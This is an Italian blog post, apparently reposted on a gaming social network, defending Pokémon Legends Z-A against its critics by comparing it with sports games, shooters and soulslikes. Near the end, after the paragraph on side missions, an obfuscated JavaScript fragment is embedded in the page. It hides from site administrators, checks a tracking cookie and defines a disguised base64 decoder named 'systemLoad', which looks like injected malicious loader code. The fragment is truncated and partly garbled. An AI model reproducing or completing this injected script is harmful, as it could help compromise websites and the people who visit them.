Ludomedia è il social network per chi ama i videogiochi. Iscriviti per scoprire un nuovo modo di vivere la tua passione.

Leggende Pokémon Z-A per principianti

La sezione delle unpopular opinion



FIFA e PES sono sempre la stessa cosa. Così pure Madden, NFL e un po' tutti i giochi sportivi. State pagando prezzo pieno per delle novità talmente piccole che si potevano mettere in un DLC alla metà di quel prezzo.



window.RTBuzz.cmd.push("masthead1");I giochi di corsa non fanno una fine poi tanto diversa – alla fine uno vale l'altro, il concetto è sempre quello. La grafica bellissima eh, ma la trama è così scema che sembra inesistente. Perché in effetti non c'è.



Call of Duty? HA HA HA HA. Dai, su, le trame delle guerre stanno scritte sui libri di storia. Divertente, perché poi quando massacrano un popolo intero sotto i nostri occhi non ce ne frega quasi un cazzo perché “tanto non possiamo fare nulla”. Gli sparatutto non rendono violenti, ma potrebbero rendere più attenti a certe cose. Obiettivo? Molto fallito. Se ne volete uno con una guerra inventata giocatevi almeno Resistance, quella saga era carina.



No, soulslike, non vi siete salvati. Siete noiosi in culo, e peggio ancora dovete anche farmi incazzare più del voluto per superare una boss fight (perché a me le sfide piacciono, ma dopo il sesto tentativo subentra la mancanza di autostima). E poi mi spiegate perché devo andarmi a cercare la trama io?! Volete dirmi le cose come stanno e basta?



Veniamo al dunque: come avrete immaginato, a me i generi e giochi su citati fanno così schifo che ho giocato due di quei giochi in croce, e tra l'altro più di una decina di anni fa. Questo non mi legittima a opinioni del tipo “voi che continuate a comprare FIFA avete il prosciutto sugli occhi”, perché come spendete i vostri soldi non è affar mio. Il punto della sezione unpopular opinion è che il messaggio che fa fatica a passare è che i fan dei Pokémon sono perfettamente consapevoli del problema (e di essere parte del problema), ma nutrono (nutriamo) una basilare speranza di miglioramento che a timidi passi in realtà non sembra del tutto disattesa.



window.RTBuzz.cmd.push("insideposttop2");Se va detto di Leggende Z-A che è piatto e c'è poca ciccia, va detto lo stesso di qualsiasi soulslike. Pieni di sottotrame (per quanto in un caso autoconclusive), di citazioni e riferimenti da andarsi a cercare.



Se va detto di Leggende Z-A che i palazzi sono scatole con sopra degli adesivi, va detto che cosa minchia ve ne frega in uno sparatutto della grafica della mappa?!



Se va detto di Leggende Z-A che i design delle megaevoluzioni sono pigri e fanno cagare (e ci sta pure perché il bello sta negli occhi di chi guarda) – ve lo ricordate vero che i giocatori dei giochi sportivi sono sempre gli stessi? E se va detto che i bug non sono mai belli da avere, scommetto che i vostri più cari ricordi videoludici d'infanzia saranno la città dei numeri, il Tangela rosso, la clonazione dei Pokémon, MissingNo., il maggiordomo di Tomb Raider chiuso in un frigorifero, le password di salvataggio di Metroid, il carpiato all'indietro di Super Mario 64, tutto quanto l'online dei Super Mario Maker, TUTTO QUANTO IL FOTTUTO SKYRIM?



Se sei arrivata qua sotto, persona da Cittàlaggiù, è necessario che tu sappia che a dispetto della lunga lista appena fatta io sono d'accordo con te: Leggende Z-A è ben lontano dall'essere perfetto, e mi fa incazzare che un gioco ambientato in una sola città non abbia avuto cura proprio della città. Ma sai che c'è? Che stavolta ci ho fatto anche meno caso. Il gioco di cose da fare ne ha, e quella città esteticamente piatta e con le texture copia-incollate in realtà è anche abbastanza viva.



window.RTBuzz.cmd.push("topmobile");Quel che di cura grafica mi è mancato l'ho trovato in altri dettagli. I Trubbish e Garbodor nei vicoli accanto all'immondizia, ad esempio, o i Pidgey e Fletchling sui lampioni. I Clefairy che ballano assieme sotto la luna, come Versione Speciale Gialla ci ha insegnato. La consegna del primo compagno di Kanto, nel laboratorio che una volta era di Platan – o ancora meglio le missioni riservate ai compagni iniziali di Kalos che ti raccontano una storia. Quasi tutte le missioni secondarie, a dire il vero, ti raccontano una breve storia: molto reminiscente di quelle puntate del cartone animato che amiamo, come quella in cui Ash incontra il suo Charmander o il Gengar abbandonato da un altro allenatore.
(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(//g,'');while(i

Continua la lettura su ilovevg.it

oggi alle 19:00